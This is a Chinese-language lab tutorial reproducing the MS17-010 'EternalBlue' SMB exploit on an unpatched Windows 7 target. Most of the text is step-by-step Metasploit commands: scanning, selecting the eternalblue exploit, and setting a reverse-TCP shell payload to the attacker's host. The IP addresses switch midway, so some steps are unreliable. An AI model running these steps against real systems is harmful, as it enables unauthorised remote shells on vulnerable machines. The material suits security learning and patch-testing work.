天天看點

MS17-010 ——永恒之藍漏洞利用

背景介紹

原理:“永恒之藍”的原理主要是掃描所有開放445檔案共享端口的Windows機器,利用Windows系統的SMB漏洞可以擷取系最高權限。

影響範圍:Windows Vista、Win7、Win8、Win XP、Windows server 2003等。

防範措施:及時更新Windows系統更新檔;不要輕易打開陌生的檔案;關閉445、139端口。

環境:

攻擊機:kali IP:192.168.137.44

靶機:win7 IP:192.168.137.190 (開放445端口且沒有打更新檔)

工具:MSF架構

漏洞複現:

nmap對靶機進行掃描

MS17-010 ——永恒之藍漏洞利用

1. 在kali終端打開metasploit

msfconsole
           
MS17-010 ——永恒之藍漏洞利用

2. 尋找永恒之藍相關掃描子產品

search ms17-010
           
MS17-010 ——永恒之藍漏洞利用

3. 利用掃描子產品掃描确定漏洞

  1. 利用smb_ms17_010漏洞掃描子產品,利用它可以确定目标是否存在該漏洞。
use auxiliary/scanner/smb/smb_ms17_010
           
  1. 檢視需要填充哪些參數
show options
           

RHOSTS參數是你即将掃描的網段,當然也可以隻有一個主機IP

MS17-010 ——永恒之藍漏洞利用
  1. 設定靶機IP位址
set rhosts 192.168.137.190
           
  1. 開始掃描
exploit 或 run  都表示開始執行
           

如果結果中前面有個綠色的加号,則說明可以利用該漏洞

MS17-010 ——永恒之藍漏洞利用

4. 利用攻擊子產品攻擊

  1. 選擇攻擊子產品
use exploit/windows/smb/ms17_010_eternalblue
           
  1. 選擇payload
set payload generic/shell_reverse_tcp
           
  1. 設定rhost(靶機IP)
set rhost 192.168.1.103
           
  1. 設定lhost(攻擊機IP)
set lhost 192.168.1.105
           
  1. 設定監聽端口(預設是4444)
set lport 500  
           
MS17-010 ——永恒之藍漏洞利用

6) 開始攻擊

exploit 或 run
           
MS17-010 ——永恒之藍漏洞利用

5. 反彈shell

MS17-010 ——永恒之藍漏洞利用

win7檢視端口建立連接配接

netstat -an
           
MS17-010 ——永恒之藍漏洞利用

繼續閱讀